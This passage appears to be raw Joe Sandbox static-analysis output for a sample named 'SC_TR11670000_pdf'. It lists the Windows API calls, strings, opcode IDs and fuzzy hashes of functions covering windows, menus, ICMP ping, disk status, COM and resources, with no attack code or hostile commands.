                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B3C8B4
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B3C8C1
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 00AE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE2036,?,00000000,?,?,?,?,00AE16CB,00000000,?), ref: 00AE1B9A
                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AE20D3
                                                                          • KillTimer.USER32(-00000001,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00AE216E
                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00B1BEF6
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00B1BF27
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00B1BF3E
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AE16CB,00000000,?,?,00AE1AE2,?,?), ref: 00B1BF5A
                                                                          • DeleteObject.GDI32(00000000), ref: 00B1BF6C
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 00AE25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AE25EC
                                                                          • GetSysColor.USER32(0000000F), ref: 00AE21D3
                                                                          Similarity
                                                                          • API ID: ColorLongWindow
                                                                          • String ID:
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,00B6F910), ref: 00B4AB76
                                                                          • GetDriveTypeW.KERNEL32(00000061,00B9A620,00000061), ref: 00B4AC40
                                                                          • _wcscpy.LIBCMT ref: 00B4AC6A
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __i64tow__itow__swprintf
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B673D9
                                                                          • CreateMenu.USER32 ref: 00B673F4
                                                                          • SetMenu.USER32(?,00000000), ref: 00B67403
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B67490
                                                                          • IsMenu.USER32(?), ref: 00B674A6
                                                                          • CreatePopupMenu.USER32 ref: 00B674B0
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B674DD
                                                                          • DrawMenuBar.USER32 ref: 00B674E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                          • String ID: 0$F
                                                                          • API String ID: 176399719-3044882817
                                                                          • Opcode ID: 21d9206e9d4d278839f9300b2d95a147a8d0d3ae56d84c936d814c11999a627d
                                                                          • Instruction ID: 8a646726804c1eea7e8736a42d92e313243918852d337978b71ff9c1d96e19f5
                                                                          • Opcode Fuzzy Hash: 21d9206e9d4d278839f9300b2d95a147a8d0d3ae56d84c936d814c11999a627d
                                                                          • Instruction Fuzzy Hash: FB414975A01205EFDB10DF64E888AAABBF9FF49304F144069E956973A0DF78AD10CF90
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B677CD
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00B677D4
                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B677E7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B677EF
                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B677FA
                                                                          • DeleteDC.GDI32(00000000), ref: 00B67803
                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00B6780D
                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B67821
                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B6782D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                          • String ID: static
                                                                          • API String ID: 2559357485-2160076837
                                                                          • Opcode ID: b3ca9e939a06ad3cb13d63765c3c728d835b7583b802030e7788a918ce58f38e
                                                                          • Instruction ID: 7754f68c5ce90e36181e2563076b71b89422b710866294133562feb326554bf4
                                                                          • Opcode Fuzzy Hash: b3ca9e939a06ad3cb13d63765c3c728d835b7583b802030e7788a918ce58f38e
                                                                          • Instruction Fuzzy Hash: 22318F31104115ABDF119FA5EC09FEA3BA9FF09325F100264FA15A70E0CB79DC11DBA4
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B0707B
                                                                            • Part of subcall function 00B08D68: __getptd_noexit.LIBCMT ref: 00B08D68
                                                                          • __gmtime64_s.LIBCMT ref: 00B07114
                                                                          • __gmtime64_s.LIBCMT ref: 00B0714A
                                                                          • __gmtime64_s.LIBCMT ref: 00B07167
                                                                          • __allrem.LIBCMT ref: 00B071BD
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B071D9
                                                                          • __allrem.LIBCMT ref: 00B071F0
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B0720E
                                                                          • __allrem.LIBCMT ref: 00B07225
                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B07243
                                                                          • __invoke_watson.LIBCMT ref: 00B072B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                          • String ID:
                                                                          • API String ID: 384356119-0
                                                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                          • Instruction ID: 2d08b8fb1f3e5f13dd67d2a5474c1b4fe1b1afe46fafb23360c0ddd991bc59ff
                                                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                          • Instruction Fuzzy Hash: B671C371E44716ABE7149E79CC81B9AFBE8EF11720F1442BAF414E62C1FB70EA408790
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B42A31
                                                                          • GetMenuItemInfoW.USER32(00BA6890,000000FF,00000000,00000030), ref: 00B42A92
                                                                          • SetMenuItemInfoW.USER32(00BA6890,00000004,00000000,00000030), ref: 00B42AC8
                                                                          • Sleep.KERNEL32(000001F4), ref: 00B42ADA
                                                                          • GetMenuItemCount.USER32(?), ref: 00B42B1E
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00B42B3A
                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00B42B64
                                                                          • GetMenuItemID.USER32(?,?), ref: 00B42BA9
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B42BEF
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B42C03
                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B42C24
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                          • String ID:
                                                                          • API String ID: 4176008265-0
                                                                          • Opcode ID: 2b609247ff403adaa76cb81eab6dba506408cb648e0829ca0b6509f502d12fb9
                                                                          • Instruction ID: a3c104eb4a0a29a3c607e3169276d8c03a6d933b777cd0383b7b78ecbb04aff8
                                                                          • Opcode Fuzzy Hash: 2b609247ff403adaa76cb81eab6dba506408cb648e0829ca0b6509f502d12fb9
                                                                          • Instruction Fuzzy Hash: 7B6190B0900249AFDF11CF64D888EBEBBF8EB45304F940599F84297291DB71AE45FB21
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B67214
                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B67217
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6723B
                                                                          • _memset.LIBCMT ref: 00B6724C
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B6725E
                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B672D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow_memset
                                                                          • String ID:
                                                                          • API String ID: 830647256-0
                                                                          • Opcode ID: 1c1fbc664f641ce628ece3526af70b5ff0eb6d09db9b958f2fa179cca404ad31
                                                                          • Instruction ID: 5cc27b43e204afa7ff088ce1595a565c6a4136ecebdddeb15c38ba2cc7211910
                                                                          • Opcode Fuzzy Hash: 1c1fbc664f641ce628ece3526af70b5ff0eb6d09db9b958f2fa179cca404ad31
                                                                          • Instruction Fuzzy Hash: FF616C71940208AFDB10DFA4CC81EEE77F8EB09714F14019AFA15A73A1DB74AD45DB64
                                                                          APIs
                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B37135
                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00B3718E
                                                                          • VariantInit.OLEAUT32(?), ref: 00B371A0
                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B371C0
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00B37213
                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B37227
                                                                          • VariantClear.OLEAUT32(?), ref: 00B3723C
                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00B37249
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B37252
                                                                          • VariantClear.OLEAUT32(?), ref: 00B37264
                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B3726F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                          • String ID:
                                                                          • API String ID: 2706829360-0
                                                                          • Opcode ID: ec9e3b5b6544bdbdd28552c91380fa8043dedd9f669e9ce8bc0a03edde5876e2
                                                                          • Instruction ID: 8aca950f4c1f54d635a97b02a0471b03e3fdc71195c1a45848368d93c3166602
                                                                          • Opcode Fuzzy Hash: ec9e3b5b6544bdbdd28552c91380fa8043dedd9f669e9ce8bc0a03edde5876e2
                                                                          • Instruction Fuzzy Hash: A3413A75A04219AFCF10DFA8DC489AEBBF8FF08354F1080A9E915A7361CF74A945CB90
                                                                          APIs
                                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00B55AA6
                                                                          • inet_addr.WSOCK32(?,?,?), ref: 00B55AEB
                                                                          • gethostbyname.WSOCK32(?), ref: 00B55AF7
                                                                          • IcmpCreateFile.IPHLPAPI ref: 00B55B05
                                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00B55B75
                                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00B55B8B
                                                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00B55C00
                                                                          • WSACleanup.WSOCK32 ref: 00B55C06
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                          • String ID: Ping
                                                                          • API String ID: 1028309954-2246546115
                                                                          • Opcode ID: 014512cf8be94bde41bb3c1d743f30a56cd7ad7cefd2a9f356ef317c20177abd
                                                                          • Instruction ID: 6330e6ca962c0754dbfd29f397981d5b0b80a9a0ca0bd34011897b33687fee52
                                                                          • Opcode Fuzzy Hash: 014512cf8be94bde41bb3c1d743f30a56cd7ad7cefd2a9f356ef317c20177abd
                                                                          • Instruction Fuzzy Hash: E151AF716047019FDB20AF25DD99B2AB7E4EF48312F1489AAF955DB2E1DB70EC04CB42
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4B73B
                                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00B4B7B1
                                                                          • GetLastError.KERNEL32 ref: 00B4B7BB
                                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00B4B828
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                          • API String ID: 4194297153-14809454
                                                                          • Opcode ID: 3791b2b36c197d803c4a8f06acc6322fe2e563f223558b31db03245004e98e22
                                                                          • Instruction ID: 2bc3cab7442b5a25a983484f1c325c29dccfcffe594098f1f8ff1dcddc27aa03
                                                                          • Opcode Fuzzy Hash: 3791b2b36c197d803c4a8f06acc6322fe2e563f223558b31db03245004e98e22
                                                                          • Instruction Fuzzy Hash: 73316135A00205AFDB10EF64D885EBE7BF8EF45740F1480A9E602E7291DB71DE42DB91
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B394F6
                                                                          • GetDlgCtrlID.USER32 ref: 00B39501
                                                                          • GetParent.USER32 ref: 00B3951D
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B39520
                                                                          • GetDlgCtrlID.USER32(?), ref: 00B39529
                                                                          • GetParent.USER32(?), ref: 00B39545
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B39548
                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          APIs
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00B3B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B3B0E7
                                                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B395DF
                                                                          • GetDlgCtrlID.USER32 ref: 00B395EA
                                                                          • GetParent.USER32 ref: 00B39606
                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B39609
                                                                          • GetDlgCtrlID.USER32(?), ref: 00B39612
                                                                          • GetParent.USER32(?), ref: 00B3962E
                                                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B39631
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                          • String ID: ComboBox$ListBox
                                                                          • API String ID: 1536045017-1403004172
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00B39651
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00B39666
                                                                          • _wcscmp.LIBCMT ref: 00B39678
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B396F3
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ClassMessageNameParentSend_wcscmp
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 1704125052-3381328864
                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 00B58BEC
                                                                          • CoInitialize.OLE32(00000000), ref: 00B58C19
                                                                          • CoUninitialize.OLE32 ref: 00B58C23
                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00B58D23
                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B58E50
                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B72C0C), ref: 00B58E84
                                                                          • CoGetObject.OLE32(?,00000000,00B72C0C,?), ref: 00B58EA7
                                                                          • SetErrorMode.KERNEL32(00000000), ref: 00B58EBA
                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B58F3A
                                                                          • VariantClear.OLEAUT32(?), ref: 00B58F4A
                                                                          Similarity
                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                          • String ID:
                                                                          • API String ID: 2395222682-0
                                                                          APIs
                                                                          • __swprintf.LIBCMT ref: 00B4419D
                                                                          • __swprintf.LIBCMT ref: 00B441AA
                                                                            • Part of subcall function 00B038D8: __woutput_l.LIBCMT ref: 00B03931
                                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00B441D4
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00B441E0
                                                                          • LockResource.KERNEL32(00000000), ref: 00B441ED
                                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 00B4420D
                                                                          • LoadResource.KERNEL32(?,00000000), ref: 00B4421F
                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 00B4422E
                                                                          • LockResource.KERNEL32(?), ref: 00B4423A
                                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00B4429B
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                          • String ID:
                                                                          • API String ID: 1433390588-0
                                                                          APIs
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00B41700
                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B41714
                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00B4171B
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B40778,?,00000001), ref: 00B4172A
                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B4173C
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B40778,?,00000001), ref: 00B41755
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B40778,?,00000001), ref: 00B41767
                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B417AC
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B417C1
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00B40778,?,00000001), ref: 00B417CC
                                                                          Similarity
                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                          • String ID:
                                                                          • API String ID: 2156557900-0
                                                                          APIs
                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00AEFC06
                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00AEFCA5
                                                                          • UnregisterHotKey.USER32(?), ref: 00AEFDFC
                                                                          • DestroyWindow.USER32(?), ref: 00B24A00
                                                                          • FreeLibrary.KERNEL32(?), ref: 00B24A65
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B24A92
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                          • String ID: close all
                                                                          • API String ID: 469580280-3243417748
                                                                          APIs
                                                                          • EnumChildWindows.USER32(?,00B3AA64), ref: 00B3A9A2
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ChildEnumWindows
                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                          • API String ID: 3555792229-1603158881
                                                                          APIs
                                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00AE2EAE
                                                                            • Part of subcall function 00AE1DB3: GetClientRect.USER32(?,?), ref: 00AE1DDC
                                                                            • Part of subcall function 00AE1DB3: GetWindowRect.USER32(?,?), ref: 00AE1E1D
                                                                            • Part of subcall function 00AE1DB3: ScreenToClient.USER32(?,?), ref: 00AE1E45
                                                                          • GetDC.USER32 ref: 00B1CF82
                                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B1CF95
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B1CFA3
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B1CFB8
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00B1CFC0
                                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B1D04B
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                          • String ID: U
                                                                          • API String ID: 4009187628-3372436214
                                                                          APIs
                                                                            • Part of subcall function 00AE2612: GetWindowLongW.USER32(?,000000EB), ref: 00AE2623
                                                                            • Part of subcall function 00AE2344: GetCursorPos.USER32(?), ref: 00AE2357
                                                                            • Part of subcall function 00AE2344: ScreenToClient.USER32(00BA67B0,?), ref: 00AE2374
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000001), ref: 00AE2399
                                                                            • Part of subcall function 00AE2344: GetAsyncKeyState.USER32(00000002), ref: 00AE23A7
                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B6C2E4
                                                                          • ImageList_EndDrag.COMCTL32 ref: 00B6C2EA
                                                                          • ReleaseCapture.USER32 ref: 00B6C2F0
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00B6C39A
                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B6C3AD
                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B6C48F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                           • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                           • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
